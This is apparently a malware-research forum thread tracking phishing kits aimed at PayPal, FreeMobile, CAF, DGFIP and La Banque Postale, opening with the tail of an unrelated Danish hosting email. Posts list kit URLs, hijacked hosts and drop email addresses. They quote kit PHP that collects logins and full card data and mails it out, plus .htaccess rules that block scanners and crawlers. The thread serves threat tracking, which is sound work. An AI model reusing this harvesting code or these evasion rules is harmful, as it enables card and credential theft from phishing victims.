OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Indenfor de n=E6ste 5 m=
inutter bliver dit webhotel oprettet, og du vil modtage en e-mail fra med l=
ogin-oplysninger til vores kontrolpanel=2E I kontrolpanelet kan du administ=
rere dit webhotel og dine dom=E6ner=2E Fra kontrolpanelet kan du ogs=
=E5 kontakte supporten=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff><STRONG>Office 365</STR=
ONG><BR>Hvis du har bestilt et produkt der indeholder Office 365, s=E5 vil =
du modtage en separat email herom indenfor 24 timer=2E Dit Office 365 produ=
kt fornyes =E5rligt sammen med dit webhotel, og kan opsiges =E5rligt ved fo=
rnyelsestidspunktet=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff><STRONG>F=F8lg os p=
=E5 de sociale medier</STRONG><BR>Mens du venter p=E5 at dit webhotel blive=
r klar, kan du med fordel bruge et par minutter p=E5 at f=F8lge Surftown p=
=E5 </FONT><A href=3D"http://go=2Esurftown=2Ecom/track/facebook/?m=3D{$clie=
nt=2Eemail}" target=3D_blank><FONT color=3D#ffffff>Facebook</FONT></A><FONT=
 color=3D#ffffff>, </FONT><A href=3D"http://go=2Esurftown=2Ecom/track/twitt=
er/?m=3D{$client=2Eemail}" target=3D_blank><FONT color=3D#ffffff>Twitter</F=
ONT></A><FONT color=3D#ffffff> og </FONT><A href=3D"http://go=2Esurftown=
=2Ecom/track/googleplus/?m=3D{$client=2Eemail}" target=3D_blank><FONT color=
=3D#ffffff>Google+</FONT></A><FONT color=3D#ffffff>=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Her kan du l=F8bende bl=
ive opdateret om nye produkter og tjenester fra Surftown, samt f=E5 gode r=
=E5d til hvordan du f=E5r mest muligt ud af dit webhotel=2E Du vil ogs=
=E5 kunne holde dig opdateret p=E5 den aktuelle drift og deltage i konkurre=
ncer=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff><STRONG>Sp=F8rgsm=
=E5l?</STRONG><BR>Hvis du har sp=F8rgsm=E5l, s=E5 kontakt gerne vores salgs=
afdeling p=E5 telefon +45 70 70 24 74=2E Salgsafdelingen kan tr=E6ffes alle=
 hverdage mellem klokken 9 og 16=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Du er ogs=E5 velkommen =
til at kontakte os her:<BR></FONT><A href=3D"https://controlpanel=2Esurftow=
n=2Ecom/tickets/new/&languagechange=3DDanish" target=3D_blank><FONT color=
=3D#ffffff>https://controlpanel=2Esurftown=2Ecom/tickets/new/</FONT></A></P=
>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Tak for din bestilling=
=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Venlig hilsen,<BR>Surft=
own</FONT></P></DIV></TD>
</TR>
</TBODY>
</TABLE></DIV></BODY>
</html>
----=BOUNDARY_831132_LOBO_QLJV_BWBV_UVIN--

70.90.126.5/boro.html is redirecting to spendwisor.com

• dns: 1 ›› ip: 192.163.243.139 - adress: SPENDWISOR.COM
Hijacked host, SSL support too.

Phishing kit coded by a 9yo, css is very dirty, copy in attach.
VT: 2/63 - UQ
ID PhishTank: { #3430752 | #3430751 }

Code: Select all

$send = "kymco.ksiwan@gmail.com";

--
Edit: Now CAF (Caisse d'Allocations Familiales) targeted too, without forgetting DGFIP. (thx to Yafnag for the notice :þ)

Hijacked host, still with SSL.
• dns: 1 ›› ip: 67.225.195.163 - adress: LEHUAJEWELERS.COM
• dns: 1 ›› ip: 62.219.197.106 - adress: ECOSTORE.CO.IL

Code: Select all

$send = "crypto.rb3@gmail.com";
$send = "rabiiejackson1@gmail.com";
$TO = "rayanetouati50@hotmail.com";

ID PhishTank: { #3430914 | #3430915 | #3430916 | #3430917 | #3430918 | #3430919 }

Attachments

caf-compte.fr_edf.energie.fr_impots.gouv.fr_Paypal.zip

infected
(4.37 MiB) Downloaded 62 times

www.labanquepostal.fr.zip

infected
(678.96 KiB) Downloaded 59 times

Registration Problems and FAQ - Rules For Malware Requests

Username

Xylitol

Rank

Global Moderator

Posts

1706

Joined

Sat Apr 10, 2010 5:54 pm

Location

Seireitei, Soul Society

Contact

Re: Phish-BankFraud

#26796 by malwarelabs
Thu Sep 24, 2015 2:46 pm

FreeMobile:
hXXp://aimants-et-idees.fr/error/
hXXp://59.188.15.232/errors/mobile.free.fr/c195c5e7cbcf52ec23192b0b26f9d63a/moncompte/?v=714007b36db7964ea22e40e127b73a9a
files at http://59.188.15.232/errors/mobile.free.fr.zip

Code: Select all

$_SESSION['namecc'] = $_POST['comname'];
$_SESSION['numcc']=$_POST['comnum'];
$_SESSION['mois']=$_POST['common'];
$_SESSION['year']=$_POST['comy'];
$_SESSION['cvv']=$_POST['comc'];
$mail="crypter--@hotmail.com";
$rx = "
-------------------+ FreeMobile 2014 +-------------------
User: ".$_SESSION['id']."
Pass: ".$_SESSION['pass']."
-------------------+ confirmation login +-------------------
User: ".$_SESSION['id2']."
Pass: ".$_SESSION['pass2']."
--------------------------------------
Holder Name: ".$_SESSION['namecc']."
Number: ".$_SESSION['numcc']."
Date: ".$_SESSION['mois']." / ".$_SESSION['year']."
CVV: ".$_SESSION['cvv']."
--------------------------------------
IP      : ".$ip."
HOST    : ".gethostbyaddr($ip)."
BROWSER : ".$_SERVER['HTTP_USER_AGENT']."
-------------------+ FreeMobile 2014 +-------------------
";
mail($mail,"Free results baby".$_SESSION['numcc'],$rx);

Attached

Attachments

mobile.free.zip

infected
(304.47 KiB) Downloaded 58 times

Username

malwarelabs

Posts

Joined

Tue Dec 10, 2013 9:07 am

Re: Phish-BankFraud

#27887 by benkow_
Wed Feb 17, 2016 9:57 am

Paypal phishing kit
http://www.xarajp\.com/Confirmation.Udapte.zip

Code: Select all

<?php
# Don't touch !
################# DaLi TN ########################
################ # # # # # # # # # # # # # #  ########################
################ Any problems contact me Here : ###################### 
################ # # # # # # # # # # # # # # #  ######################
### Profil : https://www.facebook.com/No.Love.No.Woman.No.Problems ###
##### Group : https://www.facebook.com/groups/YaSser127.0.0.1/ #######
############## # # # # # # # # # # # # # #  # # # # # # ##############
##################       DaLi TN       #############################
############## # # # # # # # # # # # # # # # # # #####################
################# DaLi TN  ########################
/*
 */
/*
Option Send Email :
1 : Send Email.
0 : Don't Send Email.
Option Ftp Write
1 : FTP Write.
0 : Don't FTP Save Result.
*/
$Send_Email = 1;
$Ftp_Write = 1;
//   <============================= Your Email =============================>
$to      = 'aminescormix7@gmail.com
';
//   <============================= Your Email =============================>
?>

htaccess:

Code: Select all

<Limit GET POST> 

order allow,deny 

deny from 209.85.32.23        # totaldomaindata (checkmark) 

deny from 66.205.64.22

deny from 98.247.136.154

deny from 178.25.218.88

deny from 98.247.136.154

deny from 63.229.4.212

deny from 66.135.207.155

deny from 66.77.136.153

deny from 64.122.169.98

deny from 54.217.8.129

deny from 38.100.21.113

deny from 96.47.226.21

deny from 54.197.81.106

deny from 68.168.131.216

deny from 65.17.253.220

deny from 78.151.209.28

deny from 66.135.207.155

deny from 207.102.138.158

deny from 209.139.197.125

deny from 66.77.136.153

deny from 66.77.136.123

deny from 72.64.146.136

deny from 124.178.234.95

deny from 67.15.182.35 

deny from 203.68.             # taiwan academic network 

deny from 218.58.124.         # china jpg giftsite spammer 

deny from 218.58.125. 

deny from 62.194.7.           # NE spambot 

deny from 85.17.6.            # netherlands 

deny from 194.213.            # czech norway sweden etc 

deny from 64.27.2.18          # SEO masked as SE 

deny from 64.27.2.19          # SEO masked as SE 

deny from 212.187.116.        # clown from Netherlands siphoning bible site 

deny from 84.87.              # clown from Netherlands siphoning bible site 

deny from 222.252.            # vietnam spammer 

deny from 203.160.1.          # vietnam spammer 

deny from 82.60.1.            # spamming Italy block 

deny from 68.46.186.93        # clown on comcast 

deny from 65.254.33.130       # unknown spain bot 

deny from 82.131.195.         # hungarian BS bot 

deny from 217.153.            # poland 

deny from 202.108.252.        # repeated merch spam! 

deny from 82.208.             # czech russia romania etc 

deny from 193.47.80.41        # BW sucking bot 

deny from 66.234.139.194      # bogus crawler 

deny from 80.96.              # romania 

deny from 66.232.98.76        # unknown bot 

deny from 38.112.6.182        # cosmixcorp.com 

deny from 82.165.252.147      # unknown Java BW waster 

deny from 67.79.102.28        # blacklisted spammer 

deny from 220.181.26.         # sohu bot 

deny from 64.62.136.196       # unknown stealth bot 

deny from 62.163.             # netherlands 

deny from 195.113.            # czech 

deny from 213.185.106.        # nigeria 

deny from 213.185.107.        # nigeria 

deny from 67.184.49.166       # blacklisted IP 

deny from 219.95.             # malaysia 

deny from 66.221.106.76       # mydropbox.com 

deny from 81.93.165.          # norway bot 

deny from 81.223.254.         # austrian bs bot 

deny from 87.123.74.          # patwebbot 

deny from 62.193.213.         # french BS bot 

deny from 86.120.             # romania 

deny from 86.121. 

deny from 86.122. 

deny from 86.123. 

deny from 86.124. 

deny from 86.125. 

deny from 86.126. 

deny from 86.127. 

deny from 220.194.54.         # BS bandwidth wasting bot 

deny from 210.51.167.         # BS bot 

deny from 204.14.48.          # stealth bots webhost etc 

deny from 66.180.170.47       # development bot 

deny from 217.160.75.202      # bot rips way too fast 

deny from 84.12.54.237        # unknown clown UK 

deny from 65.19.154.24        # stealth bandwidth hog 

deny from 216.32.73.122       # stealth bot 

deny from 63.160.77.236       # stealth bot 

deny from 12.44.181.220       # unknown bot 

deny from 12.44.172.92        # stealth bot 

deny from 139.18.2.           # findlinks bot 

deny from 70.85.193.178       # unknown bot 

deny from 82.80.              # israel 

deny from 82.81. 

deny from 213.180.128.        # poland 

deny from 213.180.129. 

deny from 213.180.130. 

deny from 213.180.131. 

deny from 66.150.55.230       # findwhat.com stealth bot 

deny from 67.15.175.114       # unknown bot 

deny from 217.113.244.119     # spanish SE 

deny from 194.224.199.        # private spanish server 

deny from 81.19.66.           # russia 

deny from 213.176.126.        # iran 

deny from 208.223.208.181     # security-lab1.juniper.net 

deny from 208.223.208.182 

deny from 208.223.208.183 

deny from 208.223.208.184 

deny from 208.223.208.185 

deny from 67.167.114.21       # BS law-x.com scraper site bot 

deny from 194.44.42.          # ukraine 

deny from 209.203.192.        # Expedite Marketing 

deny from 209.203.193. 

deny from 209.203.194. 

deny from 209.203.195. 

deny from 209.203.196. 

deny from 209.203.197. 

deny from 209.203.198. 

deny from 209.203.199. 

deny from 209.203.200. 

deny from 209.203.201. 

deny from 209.203.202. 

deny from 209.203.203. 

deny from 209.203.204. 

deny from 209.203.205. 

deny from 209.203.206. 

deny from 209.203.207. 

deny from 64.62.175.          # unknown bandwidth sucker 

deny from 219.136.171.        # china unknown bot 

deny from 216.150.24.122      # sonicleads.com spambot 

deny from 216.150.24.123 

deny from 210.14.32.          # annoying philipines spammer 

deny from 220.132.126.        # taiwan useragent = 3 

deny from 66.194.6.           # websense.com bandwidth waster 

deny from 12.17.130.27        # sitesucker 

deny from 65.164.129.91 

deny from 207.155.199.163 

deny from 208.252.91.3 

deny from 198.54.             # south africa scams, spam, etc 

deny from 66.132.132.63       # securityspace.com 

deny from 81.18.32.           # nigeria 

deny from 81.18.33. 

deny from 81.18.34. 

deny from 81.18.35. 

deny from 81.18.36. 

deny from 81.18.37. 

deny from 81.18.38. 

deny from 81.18.39. 

deny from 81.18.40. 

deny from 81.18.41. 

deny from 81.18.42. 

deny from 81.18.43. 

deny from 81.18.44. 

deny from 81.18.45. 

deny from 81.18.46. 

deny from 81.18.47. 

deny from 192.115.134.        # Israel, hacker heaven 

deny from 65.11.200.242       # direct revenue bot 

deny from 65.75.128.30        # fotopages.com 

deny from 204.8.168.          # gator.com 

deny from 204.8.169. 

deny from 204.8.170. 

deny from 204.8.171. 

deny from 64.152.73. 

deny from 66.111.48.80        # spambot from russia 

deny from 68.211.2.61         # clown using site copier on books 

deny from 64.42.84.70         # addresses.com spambot 

deny from 67.127.13.70        # clown hitting with gethtmlcontents3 from secure site 

deny from 80.230.             # israel 

deny from 80.250.32.          # nigeria 

deny from 80.250.33. 

deny from 80.250.34. 

deny from 80.250.35. 

deny from 80.250.36. 

deny from 80.250.37. 

deny from 80.250.38. 

deny from 80.250.39. 

deny from 80.250.40. 

deny from 80.250.41. 

deny from 80.250.42. 

deny from 80.250.43. 

deny from 80.250.44. 

deny from 80.250.45. 

deny from 80.250.46. 

deny from 80.250.47. 

deny from 69.28.130.          # quepasa.com 

deny from 213.8.              # israel 

deny from 64.42.105.          # unknown speed bot 

deny from 141.85.             # romania 

deny from 128.238.55.         # polybot 

deny from 67.68.89.           # unknown masking bot 

deny from 66.36.242.25        # unknown bot 

deny from 81.199.             # israel nigeria etc 

deny from 195.111.            # hungary 

deny from 192.115.106.        # clown from Israel speed downloading 

deny from 204.94.59.          # brandimensions.com bandwidth waster 

deny from 12.209.181.242      # speed ripping unknown agent 

deny from 217.73.             # romania ukraina russia etc 

deny from 217.218.            # iran 

deny from 217.219.            # iran 

deny from 216.53.84.61        # mail.mccarter.com 

deny from 169.132.149.100     # www.mccarter.com - new jersey law firm 

deny from 213.226.16.         # bulgaria 

deny from 216.252.167.        # idiot from Ghana demands free merch for many emails 

deny from 65.102.             # WebContent Internatioanl 

deny from 216.163.255.1       # rpa.metlife.com bored employees 

deny from 67.127.164.125      # DSL bandwidth waster 

deny from 193.253.199.        # france SE art-online.com bandwidth waster 

deny from 80.179.254.         # clown from Israel using downloader 

deny from 64.37.103.          # spambots and other non customers 

deny from 69.61.12.100        # spambot from servershost.net 

deny from 69.61.12.101 

deny from 66.246.43.167 

deny from 64.124.14.          # markmonitor.com 

deny from 38.144.36.11        # allresearch.com 

deny from 38.144.36.12 

deny from 38.144.36.13 

deny from 38.144.36.14 

deny from 38.144.36.15 

deny from 38.144.36.16 

deny from 38.144.36.17 

deny from 206.28.72.          # gettyimages.com bandwidth waster 

deny from 206.28.73. 

deny from 206.28.74. 

deny from 206.28.75. 

deny from 206.28.76. 

deny from 206.28.77. 

deny from 206.28.78. 

deny from 206.28.79. 

deny from 209.73.228.160      # allresearch.com 

deny from 209.73.228.161 

deny from 209.73.228.162 

deny from 209.73.228.163 

deny from 209.73.228.164 

deny from 209.73.228.165 

deny from 209.73.228.166 

deny from 209.73.228.167 

deny from 209.73.228.168 

deny from 209.73.228.169 

deny from 209.73.228.170 

deny from 209.73.228.171 

deny from 209.73.228.172 

deny from 209.73.228.173 

deny from 209.73.228.174 

deny from 209.73.228.175 

deny from 158.108.            # thailand university 

deny from 168.187.            # kuwait ministry of communications 

deny from 168.188.            # korea university 

deny from 66.207.120.221      # net-sweeper.com 

deny from 66.207.120.222 

deny from 66.207.120.223 

deny from 66.207.120.224 

deny from 66.207.120.225 

deny from 66.207.120.226 

deny from 66.207.120.227 

deny from 66.207.120.228 

deny from 66.207.120.229 

deny from 66.207.120.230 

deny from 66.207.120.231 

deny from 66.207.120.232 

deny from 66.207.120.233 

deny from 66.207.120.234 

deny from 66.207.120.235 

deny from 167.24.             # usaa.com and wastemylife.com p3p client 

deny from 192.118.48.247      # icomverse.com (Israel, hacker heaven) 

deny from 192.118.48.248 

deny from 192.118.48.249 

deny from 67.209.128.         # clown from TX, wastes bandwidth, abusive feedback 

deny from 12.148.209.         # NameProtect.com bandwidth waster 

deny from 12.148.196.         # NameProtect.com bandwidth waster 

deny from 212.19.205.         # clown from Netherlands impersonating Webcrawler! 

deny from 206.190.171.172     # markwatch.com bandwidth waster (4 IPs) 

deny from 206.190.171.173 

deny from 206.190.171.174 

deny from 206.190.171.175 

deny from 211.157. 

deny from 211.74. 

deny from 64.14.202.182 

deny from 213.219.11.19 

deny from 193.220.178.        # abusive crawler from Benin 

deny from 24.77.178.1         # abusive OK cable user 

deny from 68.65.53.71         # unknown user (java1.4.0_03) slowly crawling whole site! 

deny from 198.26.120.13       # unknown .MIL user (keeps hitting one page over and over!) 

deny from 63.148.99.          # Cyveillance.com bandwidth waster 

deny from 65.118.41.          # Cyveillance.com bandwidth waster 

deny from 192.116.85.         # abusive crawler, no ref, no ua, Israel? 

deny from 62.119.21.          # sweden including picsearch.com bot 

deny from 80.179.100.         # Israeli bot 

deny from 80.248.64.50        # guestbook spambot 

deny from 64.106.213.         # some clown in Jersey, Russian name, hammering links page 

deny from 62.220.103.         # Iran 

allow from all 

</Limit> 



RewriteEngine On 

RewriteRule ^addreciprocallink.shtml$  cgi-bin/rl.pl?m=add      [T=application/x-httpd-cgi] 

RewriteRule ^reciprocallinkspage.shtml$  cgi-bin/rl.pl?cat=General  [T=application/x-httpd-cgi] 

RewriteRule ^pp-(. ).shtml$  /cgi-bin/ps.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ppdvds-(. ).shtml$  /cgi-bin/psdvds.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ppvideos-(. ).shtml$  /cgi-bin/psvideos.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ppbooks-(. ).shtml$  /cgi-bin/psbooks.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ppmusic-(. ).shtml$  /cgi-bin/psmusic.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ap-fl-(. ).shtml$  /cgi-bin/a-fl.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ap-mt-(. ).shtml$  /cgi-bin/a-mt.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ap-wf-(. ).shtml$  /cgi-bin/a-wf.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ap-h-(. ).shtml$  /cgi-bin/a-h.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ap-rm-(. ).shtml$  /cgi-bin/a-rm.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ap-sf-(. ).shtml$  /cgi-bin/a-sf.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ap-g-(. ).shtml$  /cgi-bin/a-g.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^freesoftwaretitle-(. ).shtml$  /cgi-bin/freesoft.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^freesoftwaretitle-(. )-(. ).shtml$  /cgi-bin/freesoft.pl?$1-$2  [T=application/x-httpd-cgi] 

RewriteRule ^asseenontvitem-(. ).shtml$  /cgi-bin/asseen.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^asseenontvitem-(. )-(. ).shtml$  /cgi-bin/asseen.pl?$1-$2  [T=application/x-httpd-cgi] 

RewriteRule ^fordogsitem-(. ).shtml$  /cgi-bin/fordogs.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^fordogsitem-(. )-(. ).shtml$  /cgi-bin/fordogs.pl?$1-$2  [T=application/x-httpd-cgi] 

RewriteRule ^jewelryitem-(. ).shtml$  /cgi-bin/jewelry.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^jewelryitem-(. )-(. ).shtml$  /cgi-bin/jewelry.pl?$1-$2  [T=application/x-httpd-cgi] 

RewriteRule ^scooteritem-(. ).shtml$  /cgi-bin/scooters.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^redfoxjavaitem-(. ).shtml$  /cgi-bin/redfox.pl?$1  [T=application/x-httpd-cgi] 

RewriteRule ^ymc-(. )-(. ).shtml$  /cgi-bin/ymcdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^mbc-(. )-(. ).shtml$  /cgi-bin/mbcdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tbt-(. )-(. ).shtml$  /cgi-bin/tbtdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tss-(. )-(. ).shtml$  /cgi-bin/tssdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tls-(. )-(. ).shtml$  /cgi-bin/tlsdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tps-(. )-(. ).shtml$  /cgi-bin/tpsdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^wotwdet-(. )-(. ).shtml$  /cgi-bin/wotwdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tsaks-(. )-(. ).shtml$  /cgi-bin/tsaks.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tigs-(. )-(. ).shtml$  /cgi-bin/tigs.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^freesoftcd_(. )_(. ).shtml$  /cgi-bin/freesft.pl?$1_$2  [T=application/x-httpd-cgi] 

RewriteRule ^vcdet-(. )-(. ).shtml$  /cgi-bin/vcdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^fab-(. )-(. ).shtml$  /cgi-bin/fabdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tbp-(. )-(. ).shtml$  /cgi-bin/tbpdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^cifri-(. )-(. ).shtml$  /cgi-bin/cifri.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^cifdt-(. )-(. ).shtml$  /cgi-bin/cifdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tcpdcf-(. )-(. ).shtml$  /cgi-bin/tcpdcf.pl?$1-$2 [T=application/x-httpd-cgi]




RewriteRule ^tpc-(. )-(. ).shtml$  /cgi-bin/tpcdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tbcdet-(. )-(. ).shtml$  /cgi-bin/tbcdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^gjag-(. )-(. ).shtml$  /cgi-bin/gjag.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^wkdet-(. )-(. ).shtml$  /cgi-bin/wk.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^ebunvdet-(. )-(. ).shtml$  /cgi-bin/ebunvdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^fsai-(. )-(. ).shtml$  /cgi-bin/fsai.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^fdr-(. )-(. ).shtml$  /cgi-bin/fdr.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tes-(. )-(. ).shtml$  /cgi-bin/tesdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^btah-(. )-(. ).shtml$  /cgi-bin/btahdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^sms-(. )-(. ).shtml$  /cgi-bin/tsmsdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^cfkdet-(. )-(. ).shtml$  /cgi-bin/cfk.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^sfhdet-(. )-(. ).shtml$  /cgi-bin/sfh.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^bfldetail-(. )-(. ).shtml$  /cgi-bin/bfldpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tbh-(. )-(. ).shtml$  /cgi-bin/tbhdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^wgb-(. )-(. ).shtml$  /cgi-bin/wgbdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^bhg-(. )-(. ).shtml$  /cgi-bin/bhgdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^egdet-(. )-(. ).shtml$  /cgi-bin/begdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^tgddet-(. )-(. ).shtml$  /cgi-bin/tgddpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^wdd-(. )-(. ).shtml$  /cgi-bin/wddamaz.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^wddart-(. )-(. ).shtml$  /cgi-bin/wddarticle.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^blginfo-(. )-(. ).shtml$  /cgi-bin/blgdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteRule ^afwinfo-(. )-(. ).shtml$  /cgi-bin/afwdpg.pl?$1-$2 [T=application/x-httpd-cgi] 

RewriteCond %{HTTP_USER_AGENT} ^-?$ [NC,OR] # blank user-agent 

RewriteCond %{HTTP_USER_AGENT} "addresses\.com" [NC,OR] # spambot 

RewriteCond %{HTTP_USER_AGENT} "agnitum" [NC,OR] # firewall sw from Cyprus 

RewriteCond %{HTTP_USER_AGENT} aipbot [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} alkaline [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} "almaden" [NC,OR] # IBM unknown crawler 

RewriteCond %{HTTP_USER_AGENT} amfibi [NC,OR] # spanish SE 

RewriteCond %{HTTP_USER_AGENT} "anarchie" [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} anonymous [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} "applewebkit" [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} "art-online" [NC,OR] # France SE 

RewriteCond %{HTTP_USER_AGENT} arikus [NC,OR] # voxel.net webhost 

RewriteCond %{HTTP_USER_AGENT} "aspseek" [NC,OR] # unknown agent 

RewriteCond %{HTTP_USER_AGENT} baidu [NC,OR] # chinese language SE 

RewriteCond %{HTTP_USER_AGENT} "blackbox" [NC,OR] # HTML to JPG converter 

RewriteCond %{HTTP_USER_AGENT} "bordermanager" [NC,OR] # Novell network controller iow workers goofing off 

RewriteCond %{HTTP_USER_AGENT} botswana [NC,OR] # Unknown Agent 

RewriteCond %{HTTP_USER_AGENT} "bravobrian" [NC,OR] # unknown agent 

RewriteCond %{HTTP_USER_AGENT} bruinbot [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} btbot [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} "caddbot" [NC,OR] # classified ad bot 

RewriteCond %{HTTP_USER_AGENT} ccubee [NC,OR] # czech crawler 

RewriteCond %{HTTP_USER_AGENT} cfetch [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} cfnetwork [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} cherry.?picker [NC,OR] # spambot 

RewriteCond %{HTTP_USER_AGENT} cjnetworkquality [NC,OR] # cj.com bot 

RewriteCond %{HTTP_USER_AGENT} claria [NC,OR] # gator.com 

RewriteCond %{HTTP_USER_AGENT} combine [NC,OR] # swedish harvester 

RewriteCond %{HTTP_USER_AGENT} contactbot [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} convera [NC,OR] # convera.com 

RewriteCond %{HTTP_USER_AGENT} ConveraCrawler [NC,OR] # convera.com 

RewriteCond %{HTTP_USER_AGENT} cosmos [NC,OR] # xyleme.com bot 

RewriteCond %{HTTP_USER_AGENT} cowbot [NC,OR] # korean naver bot 

RewriteCond %{HTTP_USER_AGENT} cuill [NC,OR] # www.cuill.com 

RewriteCond %{HTTP_USER_AGENT} crescent [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} dattatec [NC,OR] # argentina bot 

RewriteCond %{HTTP_USER_AGENT} deepak [NC,OR] # research bot from California 

RewriteCond %{HTTP_USER_AGENT} dloader [NC,OR] # unknown downloader 

RewriteCond %{HTTP_USER_AGENT} "^DA \d\.\d " [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} "DTS Agent" [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} "^download" [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} diamond [NC,OR] # gator.com 

RewriteCond %{HTTP_USER_AGENT} dtaagent [NC,OR] # bot grabs too fast 

RewriteCond %{HTTP_USER_AGENT} dumbot [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} easydl [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} e?mail.?(collector|magnet|reaper|siphon|sweeper|harvest|collect|wolf) [NC,OR] # spambots 

RewriteCond %{HTTP_USER_AGENT} "Educate Search" [NC,OR] # guestbook spambot 

RewriteCond %{HTTP_USER_AGENT} ejupiter [NC,OR] # pathetic SE 

RewriteCond %{HTTP_USER_AGENT} entrieva [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} exava.com [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} experimental [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} expired [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} express [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} extractor [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} faxobot [NC,OR] # faxo.com 

RewriteCond %{HTTP_USER_AGENT} "Fetch API Request" [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} "fast firstpage retriever" [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} "fetchbook\.info" [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} findexa [NC,OR] # norway SE 

RewriteCond %{HTTP_USER_AGENT} findlinks [NC,OR] # german experimental bot 

RewriteCond %{HTTP_USER_AGENT} findwhat [NC,OR] 

